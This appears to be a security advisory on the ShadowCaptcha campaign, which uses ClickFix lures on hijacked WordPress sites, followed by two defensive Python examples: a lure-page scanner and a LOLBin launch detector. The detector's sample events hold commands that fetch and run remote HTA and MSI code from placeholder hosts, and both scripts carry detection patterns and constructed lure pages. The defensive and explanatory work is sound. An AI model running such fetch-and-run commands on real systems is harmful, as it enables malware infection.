
ShadowCaptcha campaign hijacks WordPress sites to deliver ransomware, info‑stealers and cryptominers

Overview

Researchers from Israel’s National Digital Agency have uncovered ShadowCaptcha, a large‑scale cybercrime campaign that abuses over 100 compromised WordPress sites. Visitors to the hijacked sites are redirected to malicious CAPTCHA pages that employ the “ClickFix” social‑engineering tactic: the pages trick users into running attacker‑supplied commands or saving an HTML Application (HTA) file, which leads to infection with information‑stealing malware, ransomware or cryptocurrency miners.

Unlike a typical drive‑by download, ShadowCaptcha needs the victim to act: it combines social engineering with Windows Living‑off‑the‑Land binaries (LOLBins) and multi‑stage payloads to gain execution and persistence. Its objectives range from credential harvesting and browser data exfiltration to deploying cryptocurrency miners or triggering ransomware outbreaks.

Attack chain and techniques

The malicious JavaScript injected into the compromised WordPress sites initiates a redirection chain that culminates in a fake Cloudflare or Google CAPTCHA page. From there, the attack follows one of two paths:

  1. Windows Run dialog branch: The page displays a ClickFix prompt instructing the user to press Win+R and paste a command that the page has already placed on the clipboard. The command launches MSI installers or HTA payloads that deploy the Lumma and Rhadamanthys information stealers.
  2. HTA file branch: The page instructs the user to save it as an HTA file and open it, which runs it under mshta.exe. This chain results in the installation of Epsilon Red ransomware.

To increase the success rate, the attackers use JavaScript that automatically copies the malicious command to the user’s clipboard, so the victim only has to paste. They also use anti‑debugging techniques to hinder inspection with browser developer tools, and rely on DLL side‑loading so that payloads execute under the name of a legitimate process. Some variants deliver XMRig miners and fetch their configuration data from Pastebin.
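The indicators described above (a fake Cloudflare/Google verification page, a Win+R or HTA instruction, JavaScript that writes to the clipboard, and anti‑debugging code) are textual, so a site owner can scan served pages for them. The following scanner is an added example, not code from the report or from any project it names; the indicator list, the weights and the threshold are assumptions chosen for illustration, and the three sample pages are constructed.

```python
"""Added example: scan HTML/JS for ClickFix-style lure indicators of the kind
described in the ShadowCaptcha write-up. Indicator regexes, weights and the
threshold are this example's own assumptions, not values from the report."""
import re
from dataclasses import dataclass, field

# (name, pattern, weight). A single indicator is common on benign sites
# (copy buttons use the clipboard API), so the verdict needs a combination.
INDICATORS = [
    ("clipboard_write",
     re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I), 3),
    ("run_dialog_lure", re.compile(r"win(?:dows(?:\s*key)?)?\s*\+\s*r\b", re.I), 3),
    ("hta_lure", re.compile(r"\bmshta\b|\.hta\b", re.I), 3),
    ("fake_captcha",
     re.compile(r"(?:cloudflare|google).{0,40}(?:verify|captcha|human)", re.I | re.S), 2),
    ("anti_debug", re.compile(r"\bdebugger\b|devtools|outerWidth\s*-\s*innerWidth", re.I), 2),
    ("obfuscation", re.compile(r"\batob\(|fromCharCode|(?:\\x[0-9a-f]{2}){8,}", re.I), 1),
]


@dataclass
class ScanResult:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Assumed threshold: at least two indicators and a combined weight of 5,
        # e.g. a clipboard write plus a Win+R instruction, or an HTA instruction
        # on a page that imitates a CAPTCHA vendor.
        return self.score >= 5 and len(self.hits) >= 2


def scan_content(text: str) -> ScanResult:
    """Return the indicator hits and score for one served document."""
    result = ScanResult()
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            result.hits.append(name)
            result.score += weight
    return result


def scan_site(pages: dict) -> list:
    """Return the names of pages whose content trips the threshold."""
    return sorted(name for name, html in pages.items() if scan_content(html).suspicious)


# Constructed sample pages (not real captures).
BENIGN_PAGE = """<html><body><h1>My Blog</h1><pre>pip install foo</pre>
<button onclick="navigator.clipboard.writeText('pip install foo')">Copy</button>
</body></html>"""

RUN_DIALOG_PAGE = """<html><body><div class="cf">Cloudflare - Verify you are human</div>
<p>Press <b>Win + R</b>, then Ctrl+V and Enter to complete verification.</p>
<script>setInterval(function(){debugger;},100);
document.addEventListener('click',function(){navigator.clipboard.writeText(atob('PLACEHOLDER'));});
</script></body></html>"""

HTA_PAGE = """<html><body><h2>Google reCAPTCHA verification</h2>
<p>Press Ctrl+S, save this page as verify.hta and open it to continue.</p></body></html>"""

SAMPLE_SITE = {"index.html": BENIGN_PAGE, "verify.html": RUN_DIALOG_PAGE, "check.html": HTA_PAGE}

if __name__ == "__main__":
    for name, html in SAMPLE_SITE.items():
        r = scan_content(html)
        print(f"{name}: score={r.score} hits={r.hits} suspicious={r.suspicious}")
```

The benign page trips only the clipboard indicator (a legitimate copy button) and is not flagged, which is the point of requiring a combination; the two lure pages are flagged by different indicator pairs. In practice the scan belongs in the same job that checks file integrity against a known-good copy of the site, because the injected script is usually appended to an existing theme or plugin file rather than served as a new page.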

Impact and mitigation

The campaign has compromised WordPress sites across Australia, Brazil, Italy, Canada, Colombia and Israel, affecting sectors from technology and hospitality to healthcare and real estate. To defend against ShadowCaptcha:

  1. Patch and harden WordPress sites. Apply the latest updates, remove outdated plugins and scan for unauthorized modifications.
  2. Deploy web application firewalls and content‑security policies to block malicious scripts and redirection chains.
  3. Educate users about ClickFix‑style scams. They should never run commands or save HTA files at the instruction of a web page.
  4. Implement network segmentation and multi‑factor authentication to limit lateral movement.
  5. Monitor logs and endpoints for suspicious activity such as clipboard manipulation or unusual use of msiexec.exe, mshta.exe and DLL side‑loading.
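Step 5 is concrete on the endpoint: a command typed into the Win+R dialog is spawned by explorer.exe, so an mshta.exe or msiexec.exe process whose parent is explorer.exe and whose command line carries a URL or an .hta path is the footprint of both branches described above. The detector below is an added example, not the agency's or any vendor's detection logic; it assumes process-creation events exported as JSON lines with Sysmon Event ID 1-style field names (Image, ParentImage, CommandLine, User, Computer), and the event lines are constructed.

```python
"""Added example: flag ClickFix-style LOLBin launches in constructed
process-creation events. The JSON field names are an assumption modelled on
Sysmon Event ID 1; adapt them to your telemetry source."""
import json
import re
from pathlib import PureWindowsPath

# LOLBins named in the write-up plus the interpreters commonly pasted into the
# Run dialog. explorer.exe is the parent of anything started from Win+R.
LOLBINS = {"mshta.exe", "msiexec.exe", "powershell.exe", "cmd.exe", "rundll32.exe"}
RUN_DIALOG_PARENT = "explorer.exe"
URL_OR_HTA = re.compile(r"https?://|\.hta\b", re.I)


def _basename(path: str) -> str:
    # PureWindowsPath parses Windows paths correctly even on a Linux analysis host.
    return PureWindowsPath(path).name.lower()


def is_clickfix_launch(event: dict) -> bool:
    """True when a LOLBin is started from the Run dialog with a remote or HTA argument."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    return parent == RUN_DIALOG_PARENT and image in LOLBINS and bool(URL_OR_HTA.search(cmd))


def detect(lines) -> list:
    """Return one alert dict per matching event; malformed lines are skipped."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate truncated or non-JSON lines in a real export
        if is_clickfix_launch(event):
            alerts.append({
                "host": event.get("Computer", "?"),
                "user": event.get("User", "?"),
                "image": _basename(event.get("Image", "")),
                "cmd": event.get("CommandLine", ""),
            })
    return alerts


# Constructed sample events (placeholder hosts and .invalid domains, not real IoCs).
SAMPLE_EVENTS = r"""
{"Computer":"WS01","User":"CORP\\alice","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta.exe https://captcha.example.invalid/verify.hta"}
{"Computer":"WS01","User":"CORP\\alice","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe C:\\Users\\alice\\notes.txt"}
{"Computer":"WS02","User":"NT AUTHORITY\\SYSTEM","ParentImage":"C:\\Windows\\System32\\services.exe","Image":"C:\\Windows\\System32\\msiexec.exe","CommandLine":"msiexec.exe /V"}
{"Computer":"WS02","User":"CORP\\bob","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\msiexec.exe","CommandLine":"msiexec /i https://cdn.example.invalid/update.msi /qn"}
{"Computer":"WS03","User":"CORP\\carol","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c dir"}
this line is not json and must be skipped
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

The msiexec.exe event parented by services.exe is the Windows Installer service starting normally and is left alone; only the two Run-dialog launches with a remote argument are reported. The same parent/child/argument triple translates directly into a SIEM or EDR rule, and a clipboard-write indicator from the web-side scan can be joined to it on host and time to raise confidence.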

Conclusion

ShadowCaptcha illustrates how attackers continue to innovate by combining social engineering with living‑off‑the‑land binaries and multi‑stage payloads. By hijacking trusted WordPress sites, the campaign can reach a wide audience while evading security controls. Organizations must harden their web presence, educate users and employ layered defences to prevent malware infections via malicious CAPTCHA scams.